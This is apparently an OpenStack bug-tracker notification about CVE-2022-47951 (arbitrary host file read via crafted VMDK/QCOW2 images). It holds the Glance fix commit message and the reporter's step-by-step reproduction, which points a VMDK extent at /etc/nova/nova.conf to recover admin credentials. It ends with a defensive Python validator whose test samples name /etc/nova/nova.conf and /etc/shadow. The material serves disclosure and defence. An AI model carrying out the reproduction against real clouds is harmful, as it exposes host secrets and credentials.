Reviewed:  https://review.opendev.org/c/openstack/glance/+/871613
Committed: https://opendev.org/openstack/glance/commit/0d6282a01691cecc2798f7858b181c4bb30f850c
Submitter: "Zuul (22348)"
Branch:    master
commit 0d6282a01691cecc2798f7858b181c4bb30f850c
Author: Dan Smith
Date:   Mon Dec 19 15:00:35 2022 +0000

    Enforce image safety during image_conversion

    This does two things:

    1. It makes us check that the QCOW backing_file is unset on those
       types of images. Nova and Cinder do this already to prevent an
       arbitrary (and trivial to accomplish) host file exposure exploit.

    2. It makes us restrict VMDK files to only allowed subtypes. These
       files can name arbitrary files on disk as extents, providing the
       same sort of attack. Default that list to just the types we
       believe are actually useful for openstack, and which are
       monolithic.

    The configuration option to specify allowed subtypes is added in
    glance's config and not in the import options so that we can extend
    this check later to image ingest. The format_inspector can tell us
    what the type and subtype is, and we could reject those images early
    and even in the case where image_conversion is not enabled.

    Closes-Bug: #1996188
    Change-Id: Idf561f6306cebf756c787d8eefdc452ce44bd5e0

** Changed in: glance
   Status: In Progress => Fix Released

--
https://bugs.launchpad.net/bugs/1996188

Title:
  [OSSA-2023-002] Arbitrary file access through custom VMDK flat descriptor (CVE-2022-47951)

Status in Cinder: In Progress
Status in Glance: Fix Released
Status in OpenStack Compute (nova): New
Status in OpenStack Security Advisory: Fix Released

Bug description:
  The vulnerability managers received the following report from Sébastien Meriot with OVH via encrypted E-mail:

  Our Openstack team did discover what looks like a security issue in Nova this morning allowing a remote attacker to read any file on the system. After making a quick CVSS calculation, we got a CVSS of 5.8 (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N).

  Here are the details:

  By using a VMDK file, you can dump any file on the hypervisor.

  1. Create an image:
       qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat

  2. Edit the leak.vmdk and change the name this way:
       RW 2048 FLAT "leak-flat.vmdk" 0  -->  RW 2048 FLAT "/etc/nova/nova.conf" 0

  3. Upload the image:
       openstack image create --file leak.vmdk leak.vmdk

  4. Start a new instance:
       openstack server create --image leak.vmdk --net demo --flavor nano leak-instance

  5. The instance won't boot of course. You can create an image from this instance:
       openstack server image create --name leak-instance-image leak-instance

  6. Download the image:
       openstack image save --file leak-instance-image leak-instance-image

  7. You get access to the nova.conf file content and you can get access to the openstack admin creds.

  We are working on a fix and would be happy to share it with you if needed. We think it does affect Nova but it could affect Glance as well. We're not sure yet.

  [postscript per Arnaud Morin (amorin) in IRC] cinder seems also affected

--
Mailing list: https://launchpad.net/~yahoo-eng-team
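The two checks the commit message describes, written out as an added example (this is not glance's format_inspector nor the code in the commit above). It reads a VMDK descriptor whether it is a standalone text file (monolithicFlat, as in the report) or embedded behind the little-endian sparse extent header (monolithicSparse, streamOptimized), rejects any createType outside a monolithic allow-list and any extent line that names another file, and rejects a QCOW2 header whose backing_file offset/size fields are set. The allow-list, helper names and the sample images, including a descriptor edited exactly as in step 2 of the report, are this example's own constructions; check your deployment's actual vmdk_allowed_types rather than copying the set used here.

```python
"""Reject VMDK/QCOW2 images whose metadata names files on the host.

Added example, not glance's own code. Allow-list and samples are constructed.
"""
import re
import struct

SECTOR = 512
# Assumed allow-list: monolithic subtypes only (no separate extent files).
VMDK_ALLOWED_TYPES = {"monolithicSparse", "streamOptimized"}

# Extent line: ACCESS SIZE TYPE "FILENAME" [OFFSET]
_EXTENT_RE = re.compile(r'^(RW|RDONLY|NOACCESS)\s+(\d+)\s+(\S+)\s+"([^"]*)"')
_CREATE_RE = re.compile(r'^createType\s*=\s*"([^"]*)"', re.MULTILINE)


def vmdk_descriptor(data: bytes) -> str:
    """Return the text descriptor from either VMDK layout.

    A flat image *is* the descriptor (plain text). A sparse image embeds it:
    the KDMV header stores descriptorOffset/descriptorSize (u64 LE, sectors)
    at byte 28, after version, flags, capacity and grainSize.
    """
    if data[:4] == b"KDMV":
        desc_off, desc_size = struct.unpack_from("<QQ", data, 28)
        start, end = desc_off * SECTOR, (desc_off + desc_size) * SECTOR
        return data[start:end].split(b"\x00", 1)[0].decode("ascii", "replace")
    if data.lstrip().startswith(b"# Disk DescriptorFile"):
        return data.decode("ascii", "replace")
    raise ValueError("not a VMDK descriptor or sparse extent header")


def inspect_vmdk(data: bytes, allowed=VMDK_ALLOWED_TYPES):
    """Return (accepted, reason): subtype check first, then every extent."""
    try:
        desc = vmdk_descriptor(data)
    except (ValueError, struct.error) as exc:
        return False, str(exc)
    m = _CREATE_RE.search(desc)
    if not m:
        return False, "descriptor has no createType"
    if m.group(1) not in allowed:
        return False, f"createType {m.group(1)!r} not in allowed subtypes"
    # Even an allowed subtype must not point at another file: only SPARSE
    # (data in this file) and ZERO extents pass, and never a path.
    for line in desc.splitlines():
        e = _EXTENT_RE.match(line.strip())
        if not e:
            continue
        ext_type, filename = e.group(3), e.group(4)
        if ext_type not in ("SPARSE", "ZERO"):
            return False, f"extent type {ext_type} references an external file"
        if "/" in filename or "\\" in filename:
            return False, f"extent filename {filename!r} contains a path"
    return True, "ok"


def inspect_qcow2(data: bytes):
    """Return (accepted, reason): reject a header with backing_file set.

    qcow2 header (big-endian): magic, version u32, backing_file_offset u64
    at byte 8, backing_file_size u32 at byte 16.
    """
    if data[:4] != b"QFI\xfb":
        return False, "not a qcow2 image"
    off, size = struct.unpack_from(">QI", data, 8)
    if off or size:
        name = data[off:off + size].decode("utf-8", "replace")
        return False, f"backing_file set: {name!r}"
    return True, "ok"


# --- constructed samples -------------------------------------------------
# Descriptor as qemu-img writes for monolithicFlat, edited as in the report.
LEAK_DESCRIPTOR = (b'# Disk DescriptorFile\nversion=1\nCID=fffffffe\n'
                   b'parentCID=ffffffff\ncreateType="monolithicFlat"\n\n'
                   b'# Extent description\nRW 2048 FLAT "/etc/nova/nova.conf" 0\n')


def _sparse_image(create_type: str, extent_line: str) -> bytes:
    """Minimal KDMV header (descriptor at sector 1, 1 sector long) + descriptor."""
    desc = (f'# Disk DescriptorFile\nversion=1\ncreateType="{create_type}"\n'
            f'{extent_line}\n').encode()
    hdr = b"KDMV" + struct.pack("<IIQQQQ", 1, 3, 2048, 128, 1, 1)
    return hdr.ljust(SECTOR, b"\x00") + desc.ljust(SECTOR, b"\x00")


GOOD_SPARSE = _sparse_image("monolithicSparse", 'RW 2048 SPARSE "disk.vmdk"')
# Allowed subtype, but the embedded descriptor was edited to name a host file.
EVIL_SPARSE = _sparse_image("monolithicSparse", 'RW 2048 FLAT "/etc/shadow" 0')


def _qcow2(backing=None) -> bytes:
    """Minimal qcow2 v3 header; the backing file name is stored right after it."""
    hdr_len = 104
    off, size = (hdr_len, len(backing)) if backing else (0, 0)
    hdr = b"QFI\xfb" + struct.pack(">IQIIQ", 3, off, size, 16, 1 << 20)
    return hdr.ljust(hdr_len, b"\x00") + (backing or b"")


CLEAN_QCOW2 = _qcow2()
EVIL_QCOW2 = _qcow2(b"/etc/nova/nova.conf")

if __name__ == "__main__":
    for name, result in [("leak.vmdk", inspect_vmdk(LEAK_DESCRIPTOR)),
                         ("good sparse", inspect_vmdk(GOOD_SPARSE)),
                         ("evil sparse", inspect_vmdk(EVIL_SPARSE)),
                         ("clean qcow2", inspect_qcow2(CLEAN_QCOW2)),
                         ("evil qcow2", inspect_qcow2(EVIL_QCOW2))]:
        print(f"{name:12} -> {result}")
```

The subtype check alone would have stopped the reporter's leak.vmdk (monolithicFlat is not monolithic in the sense the commit means: its data lives in a second file named by the descriptor), but the extent scan is what catches a descriptor that keeps an allowed createType and still lists a FLAT extent, which is why both run. The same inspection has to happen before the bytes reach qemu-img, since the conversion itself is the step that reads the named host file.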

